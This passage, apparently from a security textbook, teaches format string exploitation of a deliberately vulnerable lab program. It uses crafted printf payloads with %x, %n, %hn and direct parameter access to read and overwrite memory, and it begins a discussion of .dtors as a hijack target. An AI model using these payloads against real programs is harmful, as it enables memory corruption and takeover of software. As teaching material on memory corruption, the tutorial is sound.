reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s

The right way to print user-controlled input:

????%08x.%08x.%08x.%s

The wrong way to print user-controlled input:

????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

Here the getenvaddr program is used to get the address for the environment variable PATH. Since the program name fmt_vuln is two bytes shorter than getenvaddr, four is added to the address; getenvaddr makes this adjustment itself, so the reported address of 0xbffffdd7 can be used as is. The bytes are written in reverse order due to the little-endian byte ordering. The fourth format parameter of %s reads from the beginning of the format string, thinking it's the address that was passed as a function argument. Since this address is the address of the PATH environment variable, it is printed as if a pointer to the environment variable were passed to printf().
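The program-name adjustment can be sketched as a small function. It assumes the rule used by the getenvaddr helper from earlier in the book, where every byte of difference in program-name length shifts the variable by two bytes; adjust_env_addr() is a hypothetical name, and the 0xbffffdd3 mentioned in the note after the code is inferred by subtracting four from the reported address rather than taken from any output shown here.

```c
#include <stdint.h>
#include <string.h>

/* Predict where an environment variable will sit when target_name runs,
 * given its address as seen from inside the program named self_name.
 * Assumption (from this book's getenvaddr helper): each extra byte in
 * the program name moves the variable two bytes lower in memory. */
uint32_t adjust_env_addr(uint32_t addr_in_self,
                         const char *self_name, const char *target_name) {
    long diff = (long)strlen(self_name) - (long)strlen(target_name);
    return addr_in_self + (uint32_t)(diff * 2);
}
```

With ./getenvaddr as self_name and ./fmt_vuln as target_name, the names differ by two bytes, so an address of 0xbffffdd3 seen inside getenvaddr would be reported as 0xbffffdd7.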

Now that the distance between the end of the stack frame and the beginning of the format string memory is known, the field-width arguments can be omitted in the %x format parameters. These format parameters are only needed to step through memory. Using this technique, any memory address can be examined as a string.

Writing to Arbitrary Memory Addresses

If the %s format parameter can be used to read an arbitrary memory address, you should be able to use the same technique with %n to write to an arbitrary memory address. Now things are getting interesting.

The test_val variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln.c program, just begging to be overwritten. The test_val variable is located at 0x08049794, so by using a similar technique, you should be able to write to the variable.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s

The right way to print user-controlled input:

????%08x.%08x.%08x.%s

The wrong way to print user-controlled input:

????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n

The right way to print user-controlled input:

??%08x.%08x.%08x.%n

The wrong way to print user-controlled input:

??bffff3d0.b7fe75fc.00000000.

[*] test_val @ 0x08049794 = 31 0x0000001f

reader@hacking:~/booksrc $

As this shows, the test_val variable can indeed be overwritten using the %n format parameter. The resulting value in test_val depends on the number of bytes written before the %n. This can be controlled to a greater degree by manipulating the field-width option.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%n

The right way to print user-controlled input:

??%x%x%x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc0

[*] test_val @ 0x08049794 = 21 0x00000015

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%100x%n

The right way to print user-controlled input:

??%x%x%100x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc

0

[*] test_val @ 0x08049794 = 120 0x00000078

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%180x%n

The right way to print user-controlled input:

??%x%x%180x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc

0

[*] test_val @ 0x08049794 = 200 0x000000c8

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%400x%n

The right way to print user-controlled input:

??%x%x%400x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc

0

[*] test_val @ 0x08049794 = 420 0x000001a4

reader@hacking:~/booksrc $

By manipulating the field-width option of one of the format parameters before the %n, a certain number of blank spaces can be inserted, resulting in the output having some blank lines. These lines, in turn, can be used to control the number of bytes written before the %n format parameter. This approach will work for small numbers, but it won't work for larger ones, like memory addresses.
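The relationship between field width and the value stored by %n can be reproduced safely in a local program. In this sketch, which is only an illustration, the literal ADDR stands in for the four address bytes at the front of the format string, the three words are passed as real arguments instead of being pulled off the stack, and bytes_before_n() is a made-up name.

```c
#include <stdio.h>

/* Number of bytes a format function has produced when it reaches %n,
 * for a string shaped like the examples above: four leading bytes,
 * two plain %x conversions, then one %x padded to `width`. */
int bytes_before_n(unsigned int w1, unsigned int w2, unsigned int w3,
                   int width) {
    char scratch[1024];
    int count = 0;

    snprintf(scratch, sizeof scratch, "ADDR%x%x%*x%n",
             w1, w2, width, w3, &count);
    return count;
}
```

Using the words seen in the output above (0xbffff3d0, 0xb7fe75fc, and 0), a width of 100 gives 4 + 8 + 8 + 100 = 120, a width of 180 gives 200, and a width of 400 gives 420, the same values that ended up in test_val.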

Looking at the hexadecimal representation of the test_val value, it's apparent that the least significant byte can be controlled fairly well. (Remember that the least significant byte is actually located in the first byte of the four-byte word of memory.) This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte can be written to each byte of a four-byte word, as shown here:

Memory                       94 95 96 97
First write to 0x08049794    AA 00 00 00
Second write to 0x08049795      BB 00 00 00
Third write to 0x08049796          CC 00 00 00
Fourth write to 0x08049797            DD 00 00 00
Result                       AA BB CC DD

As an example, let's try to write the address 0xDDCCBBAA into the test variable. In memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC, and finally 0xDD. Four separate writes to the memory addresses 0x08049794, 0x08049795, 0x08049796, and 0x08049797 should accomplish this. The first write will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc, and finally 0x000000dd.
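The effect of the four overlapping writes can be simulated on an ordinary byte array. This is only a model of the memory at 0x08049794, written under the assumption of little-endian stores; store_le32() and four_byte_writes() are names made up for the illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Write a 32-bit value at mem + offset, least significant byte first,
 * the way a %n store lands in memory on a little-endian machine. */
static void store_le32(unsigned char *mem, size_t offset, uint32_t value) {
    for (int i = 0; i < 4; i++)
        mem[offset + i] = (unsigned char)((value >> (8 * i)) & 0xff);
}

/* Apply four overlapping writes at consecutive addresses. mem must hold
 * at least 7 bytes, because the last write spills 3 bytes past the word.
 * Returns the first four bytes read back as a little-endian integer. */
uint32_t four_byte_writes(unsigned char *mem, const uint32_t values[4]) {
    for (size_t i = 0; i < 4; i++)
        store_le32(mem, i, values[i]);
    return (uint32_t)mem[0] | ((uint32_t)mem[1] << 8)
         | ((uint32_t)mem[2] << 16) | ((uint32_t)mem[3] << 24);
}
```

Writing 0xaa, 0xbb, 0xcc, and 0xdd in that order leaves 0xddccbbaa in the target word. The model also makes a side effect visible: the three bytes after the target word are overwritten as well.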

The first write should be easy.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n

The right way to print user-controlled input:

??%x%x%8x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc 0

[*] test_val @ 0x08049794 = 28 0x0000001c

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xaa - 28 + 8

$1 = 150

(gdb) quit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n

The right way to print user-controlled input:

??%x%x%150x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc

0

[*] test_val @ 0x08049794 = 170 0x000000aa

reader@hacking:~/booksrc $

The last %x format parameter uses 8 as the field width to standardize the output. This is essentially reading a random DWORD from the stack, which could output anywhere from 1 to 8 characters. Since the first overwrite puts 28 into test_val, using 150 as the field width instead of 8 should control the least significant byte of test_val to 0xAA.
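The GDB arithmetic above follows one small rule, sketched here as a function. The name next_field_width() is hypothetical, and the sketch assumes the padded value itself prints in no more characters than either field width, which holds for the 0 printed in these examples.

```c
/* Field width that makes the byte count at %n equal `target`, given
 * that a trial run with width `trial_width` left `observed` in the
 * variable. Returns -1 when the result would be below 1, which a
 * field width alone cannot reach. */
int next_field_width(int target, int observed, int trial_width) {
    int width = target - observed + trial_width;
    return width >= 1 ? width : -1;
}
```

For the run above, next_field_width(0xaa, 28, 8) gives 150, the same value GDB printed.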

Now for the next write. Another argument is needed for another %x format parameter to increment the byte count to 187, which is 0xBB in hexadecimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049794. Since this is all still in the memory of the format string, it can be easily controlled. The word JUNK is four bytes long and will work fine.

After that, the next memory address to be written to, 0x08049795, should be put into memory so the second %n format parameter can access it. This means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one. But all of these bytes of memory are also printed by the format function, thus incrementing the byte counter used for the %n format parameter. This is getting tricky.

Perhaps we should think about the beginning of the format string ahead of time. The goal is to have four writes. Each one will need to have a memory address passed to it, and among them all, four bytes of junk are needed to properly increment the byte counter for the %n format parameters. The first %x format parameter can use the four bytes found before the format string itself, but the remaining three will need to be supplied data. For the entire write procedure, the beginning of the format string should look like this:

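Figure 0x300-4. The beginning of the format string: 0x08049794, JUNK, 0x08049795, JUNK, 0x08049796, JUNK, 0x08049797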

Let's give it a try.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%8x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%8x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0

[*] test_val @ 0x08049794 = 52 0x00000034

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xaa - 52 + 8"

$1 = 126

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%126x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3c0b7fe75fc

0

[*] test_val @ 0x08049794 = 170 0x000000aa

reader@hacking:~/booksrc $

The addresses and junk data at the beginning of the format string changed the value of the necessary field width option for the %x format parameter. However, this is easily recalculated using the same method as before. Another way this could have been done is to subtract 24 from the previous field width value of 150, since 6 new 4-byte words have been added to the front of the format string.

Now that all the memory is set up ahead of time in the beginning of the format string, the second write should be simple.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"

$1 = 17

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0 4b4e554a

[*] test_val @ 0x08049794 = 48042 0x0000bbaa

reader@hacking:~/booksrc $

The next desired value for the least significant byte is 0xBB. A hexadecimal calculator quickly shows that 17 more bytes need to be written before the next %n format parameter. Since memory has already been set up for a %x format parameter, it's simple to write 17 bytes using the field width option.

This process can be repeated for the third and fourth writes.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcc - 0xbb"

$1 = 17

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xdd - 0xcc"

$1 = 17

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0 4b4e554a 4b4e554a 4b4e554a

[*] test_val @ 0x08049794 = -573785174 0xddccbbaa

reader@hacking:~/booksrc $

By controlling the least significant byte and performing four writes, an entire address can be written to any memory address. It should be noted that the three bytes found after the target address will also be overwritten using this technique. This can be quickly explored by statically declaring another initialized variable called next_val, right after test_val, and also displaying this value in the debug output. The changes can be made in an editor or with some more sed magic.

Here, next_val is initialized with the value 0x11111111, so the effect of the write operations on it will be apparent.

reader@hacking:~/booksrc $ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/g;x;G}' fmt_vuln.c > fmt_vuln2.c

reader@hacking:~/booksrc $ diff fmt_vuln.c fmt_vuln2.c

7c7

< static int test_val = -72;

---

> static int test_val = -72, next_val = 0x11111111;

27a28

> printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val);

reader@hacking:~/booksrc $ gcc -o fmt_vuln2 fmt_vuln2.c

reader@hacking:~/booksrc $ ./fmt_vuln2 test

The right way:

test

The wrong way:

test

[*] test_val @ 0x080497b4 = -72 0xffffffb8

[*] next_val @ 0x080497b8 = 286331153 0x11111111

reader@hacking:~/booksrc $

As the preceding output shows, the code change has also moved the address of the test_val variable. However, next_val is shown to be adjacent to it. For practice, let's write an address into the variable test_val again, using the new address.

Last time, a very convenient address of 0xddccbbaa was used. Since each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd is used? With this address, the first byte of 0xCD is easy to write using the %n format parameter by outputting 205 total bytes with a field width of 161. But then the next byte to be written is 0xAB, which would need to have 171 bytes outputted. It's easy to increment the byte counter for the %n format parameter, but it's impossible to subtract from it.

reader@hacking:~/booksrc $ ./fmt_vuln2 AAAA%x%x%x%x

The right way to print user-controlled input:

AAAA%x%x%x%x

The wrong way to print user-controlled input:

AAAAbffff3d0b7fe75fc041414141

[*] test_val @ 0x080497f4 = -72 0xffffffb8

[*] next_val @ 0x080497f8 = 286331153 0x11111111

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"

$1 = 200

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%8x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%8x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0

[*] test_val @ 0x080497f4 = 52 0x00000034

[*] next_val @ 0x080497f8 = 286331153 0x11111111

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8"

$1 = 161

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0

[*] test_val @ 0x080497f4 = 205 0x000000cd

[*] next_val @ 0x080497f8 = 286331153 0x11111111

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xab - 0xcd"

$1 = -34

reader@hacking:~/booksrc $

Instead of trying to subtract 34 from 205, the least significant byte is just wrapped around to 0x1AB by adding 222 to 205 to produce 427, which is the decimal representation of 0x1AB. This technique can be used to wrap around again and set the least significant byte to 0x06 for the third write.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x1ab - 0xcd"

$1 = 222

reader@hacking:~/booksrc $ gdb -q --batch -ex "p /d 0x1ab"

$1 = 427

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0

4b4e554a

[*] test_val @ 0x080497f4 = 109517 0x0001abcd

[*] next_val @ 0x080497f8 = 286331136 0x11111100

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab"

$1 = -165

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab"

$1 = 91

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0

4b4e554a

4b4e554a

[*] test_val @ 0x080497f4 = 33991629 0x0206abcd

[*] next_val @ 0x080497f8 = 286326784 0x11110000

reader@hacking:~/booksrc $

With each write, bytes of the next_val variable, adjacent to test_val, are being overwritten. The wraparound technique seems to be working fine, but a slight problem manifests itself as the final byte is attempted.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x08 - 0x06"

$1 = 2

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3a0b7fe75fc

0

4b4e554a

4b4e554a4b4e554a

[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd

[*] next_val @ 0x080497f8 = 285212674 0x11000002

reader@hacking:~/booksrc $

What happened here? The difference between 0x06 and 0x08 is only two, but eight bytes are output, resulting in the byte 0x0e being written by the %n format parameter instead. This is because the field width option for the %x format parameter is only a minimum field width, and eight bytes of data were output. This problem can be alleviated by simply wrapping around again; however, it's good to know the limitations of the field width option.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x108 - 0x06"

$1 = 258

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3a0b7fe75fc

0

4b4e554a

4b4e554a

4b4e554a

[*] test_val @ 0x080497f4 = 134654925 0x0806abcd

[*] next_val @ 0x080497f8 = 285212675 0x11000003

reader@hacking:~/booksrc $

Just like before, the appropriate addresses and junk data are put in the beginning of the format string, and the least significant byte is controlled for four write operations to overwrite all four bytes of the variable test_val. Whenever the next byte is smaller than the current one, the subtraction is accomplished by wrapping the least significant byte around. Also, any addition of less than eight may need to be wrapped around in a similar fashion, since a %x format parameter can output up to eight characters regardless of its field width.

Direct Parameter Access

Direct parameter access is a way to simplify format string exploits. In the previous exploits, each of the format parameter arguments had to be stepped through sequentially. This necessitated using several %x format parameters to step through parameter arguments until the beginning of the format string was reached. In addition, the sequential nature required three 4-byte words of junk to properly write a full address to an arbitrary memory location.

As the name would imply, direct parameter access allows parameters to be accessed directly by using the dollar sign qualifier. For example, %n$d would access the nth parameter and display it as a decimal number.

printf("7th: %7$d, 4th: %4$05d \n", 10, 20, 30, 40, 50, 60, 70, 80);

The preceding printf() call would have the following output:

7th: 70, 4th: 00040

First, the 70 is outputted as a decimal number when the format parameter of %7$d is encountered, because the seventh parameter is 70. The second format parameter accesses the fourth parameter and uses a field width option of 05. All of the other parameter arguments are untouched. This method of direct access eliminates the need to step through memory until the beginning of the format string is located, since this memory can be accessed directly. The following output shows the use of direct parameter access.

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%x%x%x%x

The right way to print user-controlled input:

AAAA%x%x%x%x

The wrong way to print user-controlled input:

AAAAbffff3d0b7fe75fc041414141

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%4\$x

The right way to print user-controlled input:

AAAA%4$x

The wrong way to print user-controlled input:

AAAA41414141

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

In this example, the beginning of the format string is located at the fourth parameter argument. Instead of stepping through the first three parameter arguments using %x format parameters, this memory can be accessed directly. Since this is being done on the command line and the dollar sign is a special character, it must be escaped with a backslash. This just tells the command shell to avoid trying to interpret the dollar sign as a special character. The actual format string can be seen when it is printed correctly.

Direct parameter access also simplifies the writing of memory addresses. Since memory can be accessed directly, there's no need for four-byte spacers of junk data to increment the byte output count. Each of the %x format parameters that usually performs this function can just directly access a piece of memory found before the format string. For practice, let's use direct parameter access to write a more realistic-looking address of 0xbffffd72 into the variable test_val.

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%4\$n

The right way to print user-controlled input:

????????%4$n

The wrong way to print user-controlled input:

????????

[*] test_val @ 0x08049794 = 16 0x00000010

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0x72 - 16

$1 = 98

(gdb) p 0xfd - 0x72

$2 = 139

(gdb) p 0xff - 0xfd

$3 = 2

(gdb) p 0x1ff - 0xfd

$4 = 258

(gdb) p 0xbf - 0xff

$5 = -64

(gdb) p 0x1bf - 0xff

$6 = 192

(gdb) quit

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n

The right way to print user-controlled input:

????????%98x%4$n%139x%5$n

The wrong way to print user-controlled input:

????????

bffff3c0

b7fe75fc

[*] test_val @ 0x08049794 = 64882 0x0000fd72

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

The right way to print user-controlled input:

????????%98x%4$n%139x%5$n%258x%6$n%192x%7$n

The wrong way to print user-controlled input:

????????

bffff3b0

b7fe75fc

0

8049794

[*] test_val @ 0x08049794 = -1073742478 0xbffffd72

reader@hacking:~/booksrc $

Since the stack doesn't need to be printed to reach our addresses, the number of bytes written at the first format parameter is 16. Direct parameter access is only used for the %n parameters, since it really doesn't matter what values are used for the %x spacers. This method simplifies the process of writing an address and shrinks the mandatory size of the format string.

Using Short Writes

Another technique that can simplify format string exploits is using short writes. A short is typically a two-byte word, and format parameters have a special way of dealing with them. A more complete description of possible format parameters can be found in the printf manual page. The portion describing the length modifier is shown in the output below.

The length modifier

Here, integer conversion stands for d, i, o, u, x, or X conversion.

h A following integer conversion corresponds to a short int or

unsigned short int argument, or a following n conversion

corresponds to a pointer to a short int argument.

This can be used with format string exploits to write two-byte shorts. In the output below, a short is written to each half of the four-byte test_val variable in turn. Naturally, direct parameter access can still be used.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn

The right way to print user-controlled input:

??%x%x%x%hn

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc0

[*] test_val @ 0x08049794 = -65515 0xffff0015

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%x%x%x%hn

The right way to print user-controlled input:

??%x%x%x%hn

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc0

[*] test_val @ 0x08049794 = 1441720 0x0015ffb8

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn

The right way to print user-controlled input:

??%4$hn

The wrong way to print user-controlled input:

??

[*] test_val @ 0x08049794 = 327608 0x0004ffb8

reader@hacking:~/booksrc $

Using short writes, an entire four-byte value can be overwritten with just two %hn parameters. In the example below, the test_val variable will be overwritten once again with the address 0xbffffd72.

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xfd72 - 8

$1 = 64874

(gdb) p 0xbfff - 0xfd72

$2 = -15731

(gdb) p 0x1bfff - 0xfd72

$3 = 49805

(gdb) quit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08\x96\x97\x04\x08")%64874x%4\$hn%49805x%5\$hn

The right way to print user-controlled input:

????%64874x%4$hn%49805x%5$hn

The wrong way to print user-controlled input:

b7fe75fc

[*] test_val @ 0x08049794 = -1073742478 0xbffffd72

reader@hacking:~/booksrc $

The preceding example used a similar wraparound method to deal with the second write of 0xbfff being less than the first write of 0xfd72. Using short writes, the order of the writes doesn't matter, so the first write can be 0xbfff and the second 0xfd72, if the two passed addresses are swapped in position. In the output below, the address 0x08049796 is written to first, and 0x08049794 is written to second.

(gdb) p 0xbfff - 8

$1 = 49143

(gdb) p 0xfd72 - 0xbfff

$2 = 15731

(gdb) quit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08\x94\x97\x04\x08")%49143x%4\$hn%15731x%5\$hn

The right way to print user-controlled input:

????%49143x%4$hn%15731x%5$hn

The wrong way to print user-controlled input:

????

b7fe75fc

[*] test_val @ 0x08049794 = -1073742478 0xbffffd72

reader@hacking:~/booksrc $

The ability to overwrite arbitrary memory addresses implies the ability to control the execution flow of the program. One option is to overwrite the return address in the most recent stack frame, as was done with the stack-based overflows. While this is a possible option, there are other targets that have more predictable memory addresses. The nature of stack-based overflows only allows the overwrite of the return address, but format strings provide the ability to overwrite any memory address, which creates other possibilities.

Detours with .dtors

In binary programs compiled with the GNU C compiler, special table sections called .dtors and .ctors are made for destructors and constructors, respectively. Constructor functions are executed before the main() function is executed, and destructor functions are executed just before the main() function exits with an exit system call. The destructor functions and the .dtors table section are of particular interest.

A function can be declared as a destructor function by defining the destructor attribute, as seen in dtors_sample.c.

dtors_sample.c

#include <stdio.h>

#include <stdlib.h>

static void cleanup(void) __attribute__ ((destructor));

int main() {

printf("Some actions happen in the main() function..\n");

printf("and then when main() exits, the destructor is called..\n");

exit(0);

}

void cleanup(void) {

printf("In the cleanup function now..\n");

}

In the preceding code sample, the cleanup() function is defined with the destructor attribute, so the function is automatically called when the main() function exits, as shown next.

reader@hacking:~/booksrc $ gcc -o dtors_sample dtors_sample.c

reader@hacking:~/booksrc $ ./dtors_sample

Some actions happen in the main() function..

and then when main() exits, the destructor is called..

In the cleanup function now..

reader@hacking:~/booksrc $

This behavior of automatically executing a function on exit is controlled by the .dtors table section of the binary. This section is an array of 32-bit addresses terminated by a NULL address. The array always begins with 0xffffffff and ends with the NULL address of 0x00000000. Between these two are the addresses of all the functions that have been declared with the destructor attribute.

The nm command can be used to find the address of the cleanup() function, and objdump can be used to examine the sections of the binary.

reader@hacking:~/booksrc $ nm ./dtors_sample

080495bc d _DYNAMIC

08049688 d _GLOBAL_OFFSET_TABLE_

080484e4 R _IO_stdin_used

w _Jv_RegisterClasses

080495a8 d __CTOR_END__

080495a4 d __CTOR_LIST__

080495b4 d __DTOR_END__

080495ac d __DTOR_LIST__

080485a0 r __FRAME_END__

080495b8 d __JCR_END__

080495b8 d __JCR_LIST__

080496b0 A __bss_start

080496a4 D __data_start

08048480 t __do_global_ctors_aux

08048340 t __do_global_dtors_aux

080496a8 D __dso_handle

w __gmon_start__

08048479 T __i686.get_pc_thunk.bx

080495a4 d __init_array_end

080495a4 d __init_array_start

08048400 T __libc_csu_fini

08048410 T __libc_csu_init

U __libc_start_main@@GLIBC_2.0

080496b0 A _edata

080496b4 A _end

080484b0 T _fini

080484e0 R _fp_hw

0804827c T _init

080482f0 T _start

08048314 t call_gmon_start

080483e8 t cleanup

080496b0 b completed.1

080496a4 W data_start

U exit@@GLIBC_2.0

08048380 t frame_dummy

080483b4 T main

080496ac d p.0

U printf@@GLIBC_2.0

reader@hacking:~/booksrc $

The nm command shows that the cleanup() function is located at 0x080483e8. It also reveals that the .dtors section starts at 0x080495ac with __DTOR_LIST__ and ends at 0x080495b4 with __DTOR_END__. This means that 0x080495ac should contain 0xffffffff, 0x080495b4 should contain 0x00000000, and the address between them (0x080495b0) should contain the address of the cleanup() function (0x080483e8).

The objdump command shows the actual contents of the .dtors section, although in a slightly confusing format. The first value of 80495ac is simply showing the address where the .dtors section is located. Then the actual bytes are shown, as opposed to DWORDs, which means the bytes are reversed. Bearing this in mind, everything appears to be correct.

reader@hacking:~/booksrc $ objdump -s -j .dtors ./dtors_sample

./dtors_sample: file format elf32-i386

Contents of section .dtors:

80495ac ffffffff e8830408 00000000 ............

reader@hacking:~/booksrc $

An interesting detail about the .dtors section is that it is writable. An object dump of the headers will verify this by showing that the .dtors section isn't labeled READONLY.

reader@hacking:~/booksrc $ objdump -h ./dtors_sample

./dtors_sample: file format elf32-i386

Sections:

Idx Name Size VMA LMA File off Algn

0 .interp 00000013 08048114 08048114 00000114 2**0

CONTENTS, ALLOC, LOAD, READONLY, DATA

1 .note.ABI-tag 00000020 08048128 08048128 00000128 2**2

